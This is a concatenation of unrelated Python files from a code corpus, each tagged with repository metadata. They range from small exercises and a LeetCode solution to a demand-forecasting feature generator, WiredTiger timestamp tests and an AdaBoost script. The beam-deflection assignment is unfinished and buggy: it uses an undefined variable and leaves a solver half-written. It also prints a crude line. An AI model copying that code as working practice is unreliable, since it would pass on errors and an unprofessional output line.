print("Finish")
# Debug Hot Keys
# fn+5 -> start
# fn+10 -> step over
# fn+11 -> step in
# fn+shift+11 -> step out
| hvaleri0/Python-Programming-for-developers | debugging.py | debugging.py | py | 324 | python | en | code | 0 | github-code | 36 |
41771854107 | from random import randint, choice
class Karma:
def __init__(self):
self.__karma_points = 0
self.__days_count = 0
def one_day(self, value):
self.set_day()
try:
if value == 10:
exepts_tuple = ('KillError', 'DrunkEror', 'CarCrashError', 'GluttonyError', 'DepressionError')
raise Exception(choice(exepts_tuple))
else:
point = randint(1, 7)
self.set_karma_point(point)
except Exception as exc:
with open('karma.log', 'a', encoding='UTF-8') as file:
file.writelines(f'\nДень {self.get_day()}, ошибка: {exc}')
def set_karma_point(self, point):
self.__karma_points += point
def get_karma(self):
return self.__karma_points
def get_day(self):
return self.__days_count
def set_day(self):
self.__days_count += 1
def toconstant(self):
while True:
finish = self.get_karma()
if finish >= 500:
print(f'День {self.get_day()}, набрано {finish} очков кармы.')
break
else:
value = randint(1, 10)
self.one_day(value)
gokarma = Karma()
gokarma.toconstant()
| Bednyakov/Tasks | OOP (ООП)/08_karma/main.py | main.py | py | 1,300 | python | en | code | 0 | github-code | 36 |
19839708610 | numero = 1237543
contador = 0
#permite ejecutar un bloque de codigo
#siempre y cuando la condicion se cumpla
#en el while podemos usar el else opcional
#y se ejecuta al finalizar el while
while numero >= 1:
#contador = contador + 1
contador += 1
numero = numero / 10
else:
print(contador)
| javieralarcon77/curso-python | 6. Condiciones - Ciclos/while.py | while.py | py | 307 | python | es | code | 0 | github-code | 36 |
21119814957 | from typing import List
class Solution:
def vowelStrings(self, words: List[str], left: int, right: int) -> int:
s = set()
s.add('a'); s.add('e'); s.add('i'); s.add('o'); s.add('u')
ans = 0
i = 0
for word in words:
if left<=i<=right:
if word[0] in s and word[len(word)-1] in s:
ans += 1
i += 1
return ans
if __name__ == '__main__':
words = ["are","amy","u"]
left = 0
right = 2
words = ["hey","aeo","mu","ooo","artro"]
left = 1
right = 4
rtn = Solution().vowelStrings(words, left, right)
print(rtn) | plattanus/leetcodeDAY | python/6315. 统计范围内的元音字符串数.py | 6315. 统计范围内的元音字符串数.py | py | 648 | python | en | code | 0 | github-code | 36 |
43205799120 |
import pandas as pd
import numpy as np
import sqlite3
from datetime import timedelta
import matplotlib.pyplot as plt
import pandas as pd
from copy import deepcopy
from ipywidgets import IntProgress
import warnings
warnings.filterwarnings(action='ignore', category=FutureWarning) # setting ignore as a parameter and further adding category
def percentile(n):
'''Calculate n - percentile of data'''
def percentile_(x):
return np.percentile(x, n)
percentile_.__name__ = 'pctl%s' % n
return percentile_
def fill_missing_dates(x, date_col):
min_date, max_date = x[date_col].min(), x[date_col].max()
groupby_day = x.groupby(pd.PeriodIndex(x[date_col], freq='D'))
results = groupby_day.sum(min_count=1).sort_values(by=date_col)
return results
idx = pd.period_range(min_date, max_date)
results = results.reindex(idx, fill_value=np.nan)
results.index.rename(date_col, inplace=True)
return results
def calc_preag_fill(data, group_col, date_col, target_cols, preagg_method):
## calc preaggregation
data_preag = data.groupby(group_col).agg(
preagg_method)[target_cols].reset_index().sort_values(by=date_col)
## fill missing dates
data_preag_filled = data_preag.groupby(group_col[:-1]).apply(
fill_missing_dates, date_col=date_col).drop(group_col[:-1],
axis=1).reset_index()
## return DataFrame with calculated preaggregation and filled missing dates
return data_preag_filled
def calc_ewm(data_preag_filled, group_col, date_col, span):
## calc ewm stats
lf_df_filled = data_preag_filled.groupby(group_col[:-1]). apply(lambda x: x.set_index(date_col).ewm(span=span).mean()).drop(group_col[:-1], axis=1)
## return DataFrame with rolled columns from target_vars
return lf_df_filled
def shift(lf_df_filled, group_col, date_col, lag):
lf_df = lf_df_filled.groupby(
level=group_col[:-1]).apply(lambda x: x.shift(lag)).reset_index()
lf_df[date_col] = pd.to_datetime(lf_df[date_col].astype(str))
## return DataFrame with following columns: filter_col, id_cols, date_col and shifted stats
return lf_df
def calc_rolling(data_preag_filled, group_col, date_col, method, w):
## calc rolling stats
lf_df_filled = data_preag_filled.groupby(group_col[:-1]). apply(lambda x: x.set_index(date_col).rolling(window=w, min_periods=1).agg(method)).drop(group_col[:-1], axis=1)
## return DataFrame with rolled columns from target_vars
return lf_df_filled
def day_features(result2):
result2["weekday"] = result2.period_dt.dt.weekday
result2["monthday"] = result2.period_dt.dt.day
result2['is_weekend'] = result2.weekday.isin([5,6])*1
return result2
def generate_lagged_features(
data: pd.DataFrame,
target_cols: list = ['Demand'],
id_cols: list = ['SKU_id', 'Store_id'],
date_col: str = 'Date',
lags: list = [7, 14, 21, 28],
windows: list = ['7D', '14D', '28D', '56D'],
preagg_methods: list = ['mean'],
agg_methods: list = ['mean', 'median', percentile(10), pd.Series.skew],
dynamic_filters: list = ['weekday', 'Promo'],
ewm_params: dict = {'weekday': [14, 28], 'Promo': [14, 42]}) -> pd.DataFrame:
'''
data - dataframe with default index
target_cols - column names for lags calculation
id_cols - key columns to identify unique values
date_col - column with datetime format values
lags - lag values(days)
windows - windows(days/weeks/months/etc.),
calculation is performed within time range length of window
preagg_methods - applied methods before rolling to make
every value unique for given id_cols
agg_methods - method of aggregation('mean', 'median', percentile, etc.)
dynamic_filters - column names to use as filter
ewm_params - span values(days) for each dynamic_filter
'''
data = data.sort_values(date_col)
out_df = deepcopy(data)
dates = [min(data[date_col]), max(data[date_col])]
total = len(target_cols) * len(lags) * len(windows) * len(preagg_methods) * len(agg_methods) * len(dynamic_filters)
progress = IntProgress(min=0, max=total)
display(progress)
for filter_col in dynamic_filters:
group_col = [filter_col] + id_cols + [date_col]
for lag in lags:
for preagg in preagg_methods:
data_preag_filled = calc_preag_fill(data, group_col, date_col,
target_cols, preagg)
## add ewm features
for alpha in ewm_params.get(filter_col, []):
#print("%s %s %s %s" % (filter_col, lag, preagg, alpha))
ewm_filled = calc_ewm(data_preag_filled, group_col,
date_col, alpha)
ewm = shift(ewm_filled, group_col, date_col, lag)
new_names = {x: "{0}_lag{1}d_alpha{2}_{3}". format(x, lag, alpha, filter_col) for x in target_cols}
out_df = pd.merge(out_df,
ewm.rename(columns=new_names),
how='outer',
on=group_col)
## add rolling features
for w in windows:
for method in agg_methods:
rolling_filled = calc_rolling(data_preag_filled,
group_col, date_col,
method, w)
## lf_df - DataFrame with following columns: filter_col, id_cols, date_col, shifted rolling stats
rolling = shift(rolling_filled, group_col, date_col,
lag)
method_name = method.__name__ if type(
method) != str else method
new_names = {x: "{0}_lag{1}d_w{2}_{3}". format(x, lag, w, filter_col) for x in target_cols}
out_df = pd.merge(out_df,
rolling.rename(columns=new_names),
how='outer',
on=group_col)
progress.value += 1
return out_df
def preABT_modification(data : pd.DataFrame) -> (pd.DataFrame):
target_cols = ['TGT_QTY']
id_cols = ['PRODUCT_ID', 'LOCATION_ID']
date_col = 'PERIOD_DT'
built_in_funcs = [pd.Series.kurtosis, pd.Series.skew]
# flts = {'Promo': {'oprm':'>0', 'npromo':'==0', 'aprm':'>-1'}, 'weekday' : {'md':'==0', 'tue':'==1', 'wd':'==2', 'th':'==3', 'fr':'==4', 'sa':'==5', 'su':'==6', 'anyday':'>-1'}}
data['NoFilter'] = 1
data_lagged_features = generate_lagged_features(data
, target_cols = target_cols
, id_cols = id_cols
, date_col = date_col
, lags = [22, 28, 35]
, windows = ['14D', '21D', '28D', '56D']
, preagg_methods = ['sum'] # ['mean', 'count']
, agg_methods = ['mean'] #, percentile(10), percentile(90)]
, dynamic_filters = ['PROMO_FLG', 'NoFilter']
, ewm_params={'NoFilter': [14, 28], 'PROMO_FLG': [14, 28]}
)
return data_lagged_features
| MaksimSavinov/demand_forecasting_pipeline | Pipeline/preABT.py | preABT.py | py | 7,729 | python | en | code | 0 | github-code | 36 |
2123056410 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 7 20:18:11 2018
@author: tanthanhnhanphan
MECH2700: Assignment 2
"""
import matplotlib.pyplot as plt
from numpy import *
from math import *
D = 100*10**3 #Dynamic Pressure
Ly = 1 #m
Lx = 5 #m
a = 20*pi/180
E = 70*10**9 #Young's Modulus
S = 96.5#Fatigue strength Mpa
Izz = 5*10**-5 #m4
ymax = 0.05 #m
FOS = 1.2
def q(i, n):
load = D*Ly*sin(a)*(1-(i*Lx/n)**2/Lx**2)
return load
"""
def x(n):
for i in range(n+1):
xx = i*Lx/n
print(xx)
print(x(7))
"""
"""
A = array([[7, -4, 1, 0, 0, 0, 0],
[-4, 6, -4, 1, 0, 0, 0],
[1, -4, 6, -4, 1, 0, 0],
[0, 1, -4, 6, -4, 1, 0],
[0, 0, 1, -4, 6, -4, 1],
[0, 0, 0, 1, -4, 5, -2],
[0, 0, 0, 0, 2, -4, 2]], float)
"""
#trial
"""
def s(n):
space = Lx/n
return space
h = s(7)
"""
#c = array([[q(1,7), q(2,7), q(3,7), q(4,7), q(5,7), q(6,7), q(7,7)]])*h**4/(E*Izz)
#b
#print(linspace(0,5,7))
def rhs(n):
h= Lx/n
q_1 = D*Ly*sin(a)*(1-(Lx/n)**2/Lx**2)*h**4/(E*Izz)
load = array([[q_1]])
#print(D*Ly*sin(a)*(1-(Lx/n)**2/Lx**2))
for i in range(2, n+1):
q_i = D*Ly*sin(a)*(1-(i*Lx/n)**2/Lx**2)*h**4/(E*Izz)
#print(D*Ly*sin(a)*(1-(i*Lx/n)**2/Lx**2))
#print(i*Lx/n)
load = vstack((load, [[q_i]]))
return load
"""
def rhs_1(n):
h = Lx/n
x = linspace(1,5,n)
q_1 = D*Ly*sin(a)*(1-(x[1]**2/Lx**2)*h**4/(E*Izz))
load = array([[q_1]])
print(load)
print(x)
#for i in range(n+1):
q_i = D*Ly*sin(a)*(1-x**2/Lx**2)*h**4/(E*Izz)
print(q_i)
#load = vstack((load, [[q_i]]))
#load = vstack((load, q_i))
return load
"""
#print("RHS",rhs(7))
#b = c.transpose()
def deflection(n):
w = zeros((n,n))
w[0,0] = 7
w[n-2, n-2] = 5
w[n-2, n-1] = -2
w[n-1, n-3] = 2
w[n-1, n-1] = 2
for k in range(0,n-1):
w[k+1, k] = -4
for k in range(0, n-3):
w[k+1,k+1] = 6
for k in range(0, n-2):
w[k, k+2] = 1
for k in range(0, n-3):
w[k+2,k] = 1
for k in range(0, n-2):
w[k, k+1] = -4
return w
#print(deflection((7)))
#print("~~~~")
#print(b)
#Direct Solver Gauss-Jordan Elimination
def solve(A,b, testmode = True):
"""
Input:
A: nxn matrix of coefficients
b: nx1 matrix of rhs values
Output:
x: solutions of Ax=b
"""
nrows, ncols = A.shape
c = hstack([A,b])
#print(c)
for j in range(0, nrows):
p = j
for i in range(j+1, nrows):
#Select pivot
if abs(c[i,j]) > abs(c[p,j]): p = i
#Swap the rows
c[p,:], c[j,:] = c[j,:].copy(), c[p,:].copy()
#Elimination
c[j,:] = c[j,:]/c[j,j]
for i in range(0,nrows):
if i!=j:
c[i,:] = c[i,:] - c[i,j]*c[j,:]
I, x = c[:,nrows], c[:,-1]
return x
Alist = []
Blist = []
Clist = []
Dlist = []
Elist = []
rhslist = []
def solve_optimise(A,b):
nrows, ncols = A.shape
c = hstack([A,b])
print(b)
#b.tolist()
#print(b)
#print(c)
for i in range(n-2):
Alist.append(A[i, i+2])
for i in range(n-1):
Blist.append(A[i, i+1])
for i in range(n):
Clist.append(A[i,i])
for i in range(n-1):
Dlist.append(A[i+1, i])
for i in range(n-2):
Elist.append(A[i+2, i])
for i in range(n):
rhslist.append(b[i,0])
rhslistcopy = rhslist.copy()
"""
alpha = []
mu = []
gamma = []
beta = []
z = []
mu_1 = Clist[0]
alpha_1 = Blist[0]/mu_1
beta_1 = Alist[0]/mu_1
z_1 = rhslist[0]/mu_1
gamma_2 = Dlist[0]
mu_2 = Clist[1] - alpha_1*gamma_2
alpha_2 = (Blist[1]-beta_1*gamma_2)/mu_2
beta_2 = Alist[1]/mu_2
z_2 = (rhslist[1]-z_1*gamma_2)/mu_2
alpha_minus2 = alpha_1
alpha.append(alpha_1)
alpha.append(alpha_2)
mu.append(mu_1)
mu.append(mu_2)
gamma.append(gamma_2)
beta.append(beta_1)
z.append(z_1)
z.append(z_2)
print(gamma)
for i in range(3, n-3):
gamma_i = Dlist[i-2] - alpha[i-3]*Elist[i-3]
mu_i = Clist[i-2] - beta[i-3]*Elist[i-3] - alpha[i-2]*gamma[i-2]
beta_i = Alist[i-2]/mu_i
gamma.append(gamma_i)
beta.append(beta_i)
z_i = (rhslist[i-1]-z[i-3])
"""
print(Alist)
print(Blist)
print(Clist)
print(Dlist)
print(Elist)
print(rhslist)
for i in range(n-1):
multiplier_1 = Dlist[i]/Clist[i]
#print('multi ',multiplier_1)
#print(multiplier_1)
#Dlist[i] = Dlist[i] - multiplier_1*Clist[i]
#print('before ', rhslist[i+1])
#rhslist[i+1] = rhslistcopy[i+1] - multiplier_1*rhslistcopy[i]
#print('after', rhslist[i+1])
#print(rhslist)
#print(rhslistcopy)
#print('~~~')
for i in range(n-2):
multiplier_2 = Elist[i]/Clist[i]
#print('multi ', multiplier_2)
#print(multiplier_2)
Elist[i] = Elist[i] - multiplier_2*Clist[i]
#print('Before ',rhslist[i+2])
#rhslist[i+2] = rhslist[i+2] - multiplier_2*rhslistcopy[i]
#print('After ', rhslist[i+2])
print(Dlist)
print(Elist)
#print(rhslist)
#print(Clist[n-1])
#x_n = rhslist[n-1]/Clist[n-1]
#print(x_n)
#for i in reversed(range(n)):
#print(i)
#for i in range(n-1):
#print(multiplier_1)
#print(Alist)
return
solve_optimise(deflection(n), rhs(n))
#print(A)
#print(c)
#print(x)
#print(solve(deflection(280),rhs(280)))
for i in [7,14,28,280]:
A = deflection(i)
b = rhs(i)
x = solve(A,b)
xx= append(0, x)
position = []
for j in range(0,i+1):
position.append(j*Lx/i)
#print(position)
plt.plot(position, xx, label=i)
plt.xlabel('x(m)')
plt.ylabel('Deflection (m)')
plt.legend()
plt.show()
space = []
free_end_deflection = []
node = []
n = 280
#print(deflection(n))
#print(rhs(n))
sol = solve(deflection(n),rhs(n))
#print(sol)
sol_free_end = sol[[n-1]]
#print("Solution",sol_free_end)
for i in range(7, 50):
A = deflection(i)
b = rhs(i)
x = solve(A,b)
xx = x[[i-1]]
free_end_deflection.append(xx)
node.append(i)
h = Lx/i
space.append(h)
if abs(xx - sol_free_end) < 0.1/100*sol_free_end:
print(i)
break
#print(xx)
#print(h)
#print(space)
plt.plot(space, free_end_deflection)
plt.show()
def moment_stress(n):
A = deflection(n)
b = rhs(n)
x = solve(A,b)
h = Lx/n
#M_0 = E*Izz/(h**2)*(x[1]-2*x[0])
M_1 = E*Izz/(h**2)*(x[1] - 2*x[0])
#M = array([M_0])
#M = hstack((M, [M_1]))
M = array([M_1])
#Stress
#sigma_0 = M_0*ymax/Izz*10**-6
sigma_1 = M_1*ymax/Izz*10**-6
#sigma = array([sigma_0])
#sigma = hstack((sigma, sigma_1))
sigma = array([sigma_1])
#print(M)
for i in range(1,n-1):
M_i = E*Izz/(h**2)*(x[[i+1]]- 2*x[i] + x[i-1])
sigma_i = M_i*ymax/Izz*10**-6
#print(M_i)
M = hstack((M, M_i))
sigma = hstack((sigma, sigma_i))
#load = vstack((load, [[q_i]]))
M = hstack((M, [0]))
sigma = hstack((sigma, [0]))
position = []
for j in range(1, n+1):
position.append(j*Lx/n)
print(max(sigma))
#print(sigma[1])
print(len(position))
print(len(M))
Izz_new = max(M)*ymax*FOS/(S*10**6)*10**5
print("Izz hey baby cum at me",Izz_new)
plt.plot(position, M)
plt.title('Bending moment vs. length')
plt.xlabel('x (m)')
plt.ylabel('Bending moment (Nm)')
plt.show()
plt.plot(position, sigma)
plt.title('Bending stress vs. length')
plt.xlabel('x (m)')
plt.ylabel('Bending stress (MPa)')
plt.show()
#print(M)
return
moment_stress(17)
#print('RHS: ',rhs(7))
#print('RHS 1: "',rhs_1(7))
#print(rhs(7))
"""
#First line of matrix
import time
A = deflection(n)
b = rhs(n)
##################Computation time using optimised solver######################
start_op = time.time()
deflect_op = solve(A, b)
end_op = time.time()
compute_time_op = end_op - start_op
print("Computation time using optimised solver:", compute_time_op)
###############Computation time using numpy in-built solver#####################
start = time.time()
deflect = np.linalg.solve(A, b)
end = time.time()
compute_time = end - start
print("Computation time using numpy in-built solver:", compute_time)
###############Computation time using Gauss-Jordan solver#######################
start_g = time.time()
deflect_g = solve(A, b)
end_g = time.time()
compute_time_g = end_g - start_g
print("Computation time using Gauss-Jordan solver:", compute_time_g)
print("Does the solver work? \n", check(deflect_op, deflect))
"""
| oncernhan/MECH2700 | assignment2.py | assignment2.py | py | 8,879 | python | en | code | 0 | github-code | 36 |
36956060159 | from suite_subprocess import suite_subprocess
import wiredtiger, wttest
from wtscenario import make_scenarios
class test_timestamp14(wttest.WiredTigerTestCase, suite_subprocess):
tablename = 'test_timestamp14'
uri = 'table:' + tablename
format_values = [
('integer-row', dict(key_format='i', value_format='i')),
('column', dict(key_format='r', value_format='i')),
('column-fix', dict(key_format='r', value_format='8t')),
]
scenarios = make_scenarios(format_values)
def test_all_durable_old(self):
# This test was originally for testing the all_committed timestamp.
# In the absence of prepared transactions, all_durable is identical to
# all_committed so let's enforce the all_durable values instead.
all_durable_uri = self.uri + '_all_durable'
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1 = self.setUpSessionOpen(self.conn)
session2 = self.setUpSessionOpen(self.conn)
session1.create(all_durable_uri, format)
session2.create(all_durable_uri, format)
# Scenario 0: No commit timestamp has ever been specified therefore
# There is no all_durable timestamp and we will get an error
# Querying for it.
session1.begin_transaction()
cur1 = session1.open_cursor(all_durable_uri)
cur1[1]=1
session1.commit_transaction()
self.assertEquals(self.conn.query_timestamp('get=all_durable'), "0")
# Scenario 1: A single transaction with a commit timestamp, will
# result in the all_durable timestamp being set.
session1.begin_transaction()
cur1[1]=1
session1.commit_transaction('commit_timestamp=1')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "1")
# Scenario 2: A transaction begins and specifies that it intends
# to commit at timestamp 2, a second transaction begins and commits
# at timestamp 3.
session1.begin_transaction()
session1.timestamp_transaction('commit_timestamp=2')
session2.begin_transaction()
cur2 = session2.open_cursor(all_durable_uri)
cur2[2] = 2
session2.commit_transaction('commit_timestamp=3')
# As the original transaction is still running the all_durable
# timestamp is being held at 1.
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "1")
cur1[1] = 2
session1.commit_transaction()
# Now that the original transaction has finished the all_durable
# timestamp has moved to 3, skipping 2 as there is a commit with
# a greater timestamp already existing.
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "3")
# Scenario 3: Commit with a commit timestamp of 5 and then begin a
# transaction intending to commit at 4, the all_durable timestamp
# should move back to 3. Until the transaction at 4 completes.
session1.begin_transaction()
cur1[1] = 3
session1.commit_transaction('commit_timestamp=5')
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "5")
session1.begin_transaction()
# All durable will now move back to 3 as it is the point at which
# all transactions up to that point have committed.
session1.timestamp_transaction('commit_timestamp=4')
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "3")
session1.commit_transaction()
# Now that the transaction at timestamp 4 has completed the
# all durable timestamp is back at 5.
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "5")
# Scenario 4: Holding a transaction open without a commit timestamp
# Will not affect the all_durable timestamp.
session1.begin_transaction('no_timestamp=true')
session2.begin_transaction()
cur2[2] = 2
session2.commit_transaction('commit_timestamp=6')
self.assertTimestampsEqual(self.conn.query_timestamp('get=all_durable'), "6")
cur1[1] = 2
session1.commit_transaction()
def test_oldest_reader(self):
oldest_reader_uri = self.uri + '_oldest_reader_pinned'
session1 = self.setUpSessionOpen(self.conn)
session2 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(oldest_reader_uri, format)
session2.create(oldest_reader_uri, format)
# Nothing is reading so there is no oldest reader.
self.assertEquals(self.conn.query_timestamp('get=oldest_reader'), "0")
# Write some data for reading.
session1.begin_transaction()
cur1 = session1.open_cursor(oldest_reader_uri)
cur1[1]=1
session1.commit_transaction('commit_timestamp=5')
# No active sessions so no oldest reader.
self.assertEquals(self.conn.query_timestamp('get=oldest_reader'), "0")
# Create an active read session.
session1.begin_transaction('read_timestamp=5')
# Oldest reader should now exist and be equal to our read timestamp.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '5')
# Start transaction without read timestamp specified
# Should not affect the current oldest reader.
session2.begin_transaction()
cur2 = session2.open_cursor(oldest_reader_uri)
cur2[2] = 2
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '5')
session2.commit_transaction('commit_timestamp=7')
# Open read transaction with newer read timestamp, oldest
# Reader should therefore be unchanged.
session2.begin_transaction('read_timestamp=7')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '5')
# End current oldest reader transaction, it will have now moved
# up to our transaction created before.
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), '7')
session2.commit_transaction()
# Now that all read transactions have completed we will be back
# to having no oldest reader.
self.assertEquals(self.conn.query_timestamp('get=oldest_reader'), "0")
def test_pinned_oldest(self):
pinned_oldest_uri = self.uri + 'pinned_oldest'
session1 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(pinned_oldest_uri, format)
# Confirm no oldest timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=oldest_timestamp'), "0")
# Confirm no pinned timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=pinned'), "0")
# Write some data for reading.
session1.begin_transaction()
cur1 = session1.open_cursor(pinned_oldest_uri)
cur1[1]=1
session1.commit_transaction('commit_timestamp=5')
# Confirm no oldest timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=oldest_timestamp'), "0")
# Confirm no pinned timestamp exists.
self.assertEquals(self.conn.query_timestamp('get=pinned'), "0")
self.conn.set_timestamp('oldest_timestamp=5')
# Pinned timestamp should now match oldest timestamp
self.assertTimestampsEqual(self.conn.query_timestamp('get=pinned'), '5')
# Write some more data for reading.
session1.begin_transaction()
cur1[2]=2
session1.commit_transaction('commit_timestamp=8')
# Create an active read session.
session1.begin_transaction('read_timestamp=5')
# Move oldest timestamp past active read session.
self.conn.set_timestamp('oldest_timestamp=8')
# Pinned timestamp should now reflect oldest reader.
self.assertTimestampsEqual(self.conn.query_timestamp('get=pinned'), '5')
# End active read session.
session1.commit_transaction()
# Pinned timestamp should now match oldest timestamp.
self.assertTimestampsEqual(self.conn.query_timestamp('get=pinned'), '8')
def test_all_durable(self):
all_durable_uri = self.uri + '_all_durable'
session1 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(all_durable_uri, format)
# Since this is a non-prepared transaction, we'll be using the commit
# timestamp when calculating all_durable since it's implied that they're
# the same thing.
session1.begin_transaction()
cur1 = session1.open_cursor(all_durable_uri)
cur1[1] = 1
session1.commit_transaction('commit_timestamp=3')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '3')
# We have a running transaction with a lower commit_timestamp than we've
# seen before. So all_durable should return (lowest commit timestamp - 1).
session1.begin_transaction()
cur1[2] = 2
session1.timestamp_transaction('commit_timestamp=2')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '1')
session1.commit_transaction()
# After committing, go back to the value we saw previously.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '3')
# For prepared transactions, we take into account the durable timestamp
# when calculating all_durable.
session1.begin_transaction()
cur1[3] = 3
session1.prepare_transaction('prepare_timestamp=6')
# If we have a commit timestamp for a prepared transaction, then we
# don't want that to be visible in the all_durable calculation.
session1.timestamp_transaction('commit_timestamp=7')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '3')
# Now take into account the durable timestamp.
session1.timestamp_transaction('durable_timestamp=8')
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
# All durable moves back when we have a running prepared transaction
# with a lower durable timestamp than has previously been committed.
session1.begin_transaction()
cur1[4] = 4
session1.prepare_transaction('prepare_timestamp=3')
# If we have a commit timestamp for a prepared transaction, then we
# don't want that to be visible in the all_durable calculation.
session1.timestamp_transaction('commit_timestamp=4')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
# Now take into account the durable timestamp.
session1.timestamp_transaction('durable_timestamp=5')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '4')
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
# Now test a scenario with multiple commit timestamps for a single txn.
session1.begin_transaction()
cur1[5] = 5
session1.timestamp_transaction('commit_timestamp=6')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '5')
# Make more changes and set a new commit timestamp.
# Our calculation should use the first commit timestamp so there should
# be no observable difference to the all_durable value.
cur1[6] = 6
session1.timestamp_transaction('commit_timestamp=7')
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '5')
# Once committed, we go back to 8.
session1.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), '8')
def test_all(self):
all_uri = self.uri + 'pinned_oldest'
session1 = self.setUpSessionOpen(self.conn)
session2 = self.setUpSessionOpen(self.conn)
format = 'key_format={},value_format={}'.format(self.key_format, self.value_format)
session1.create(all_uri, format)
session2.create(all_uri, format)
cur1 = session1.open_cursor(all_uri)
cur2 = session2.open_cursor(all_uri)
# Set up oldest timestamp.
self.conn.set_timestamp('oldest_timestamp=1')
# Write some data for reading.
session1.begin_transaction()
cur1[1]=1
session1.commit_transaction('commit_timestamp=2')
session1.begin_transaction()
cur1[2]=2
session1.commit_transaction('commit_timestamp=4')
# Confirm all_durable is now 4.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "4")
# Create a read session.
session1.begin_transaction('read_timestamp=2')
# Confirm oldest reader is 2 and the value we read is 1.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=oldest_reader'), "2")
self.assertEqual(cur1[1], 1)
# Commit some data at timestamp 7.
session2.begin_transaction()
cur2[3] = 2
session2.commit_transaction('commit_timestamp=7')
# All_durable should now be 7.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "7")
# Move oldest to 5.
self.conn.set_timestamp('oldest_timestamp=5')
# Confirm pinned timestamp is pointing at oldest_reader.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=pinned'),
self.conn.query_timestamp('get=oldest_reader'))
# Begin a write transaction pointing at timestamp 6,
# this is below our current all_durable so it should move back
# to the oldest timestamp.
session2.begin_transaction()
session2.timestamp_transaction('commit_timestamp=6')
cur2[4] = 3
# Confirm all_durable is now equal to oldest.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'),
self.conn.query_timestamp('get=oldest_timestamp'))
session2.commit_transaction()
self.assertTimestampsEqual(
self.conn.query_timestamp('get=all_durable'), "7")
# End our read transaction.
session1.commit_transaction()
# Pinned will now match oldest.
self.assertTimestampsEqual(
self.conn.query_timestamp('get=pinned'),
self.conn.query_timestamp('get=oldest_timestamp'))
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_timestamp14.py | test_timestamp14.py | py | 15,173 | python | en | code | 24,670 | github-code | 36 |
20053108840 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 10 20:38:02 2018
@author: tf
"""
import AdaBoost
import numpy as np
#dataMat, labelMat = AdaBoost.loadDataSet()
#print(dataMat, '\n', labelMat)
#D = np.ones((5, 1)) / 5
#bestStump, minErr, bestClassEst = AdaBoost.buildStump(dataMat, labelMat, D)
#print(bestStump, '\n', minErr, '\n', bestClassEst)
#classifierArr = AdaBoost.adaBoostTrainDS(dataMat, labelMat)
#print(classifierArr)
#print(max(0.1,0.2))
#clas = AdaBoost.adaClassify(np.array([[5, 5], [0, 0]]), classifierArr)
#print(clas)
dataMat, labelMat = AdaBoost.loadFileDataSet('horseColicTraining2.txt')
classifierArr = AdaBoost.adaBoostTrainDS(dataMat, labelMat)
#print(classifierArr)
testDataMat, testLabelMat = AdaBoost.loadFileDataSet('horseColicTest2.txt')
errRate = AdaBoost.adaClassify(testDataMat, classifierArr, testLabelMat)
print(errRate) | Cjh327/Machine-Learning-in-Action | AdaBoost/AdaBoost_test.py | AdaBoost_test.py | py | 859 | python | en | code | 2 | github-code | 36 |
26667888776 | import codecs
import random
def read_proxy():
proxy_list = []
with codecs.open("proxy_pool.txt", "r") as f:
for line in f.readlines():
proxy_list.append(line.strip('\n'))
proxy = random.choice(proxy_list)
return proxy
| nado-dev/Spider_bilibili | proxy_setting.py | proxy_setting.py | py | 256 | python | en | code | 0 | github-code | 36 |
25718423751 | from roleidentification import pull_data, get_roles
def main():
print("Pulling data...")
champion_roles = pull_data()
print("Finished pulling data.")
print()
champions = [122, 64, 69, 119, 201] # ['Darius', 'Lee Sin', 'Cassiopeia', 'Draven', 'Braum']
roles = get_roles(champion_roles, champions)
print(roles)
if __name__ == "__main__":
main()
| meraki-analytics/role-identification | examples/get_roles.py | get_roles.py | py | 381 | python | en | code | 26 | github-code | 36 |
19293482431 | """Parameter Store Loader
Use (setting_name, cast function) or setting_name as lookup value.
If no cast function is passed, the parameter will be stored as retrieved
from Parameter Store, typically string or stringList.
Usage:
from awstanding.parameter_store import load_parameters
LOOKUP_DICT = {
'/my/parameter/path': 'NEW_VARIABLE'
}
load_parameters(LOOKUP_DICT)
# Now NEW_VARIABLE can be obtained from environment variables.
"""
import os
from typing import Union, Iterable
import boto3
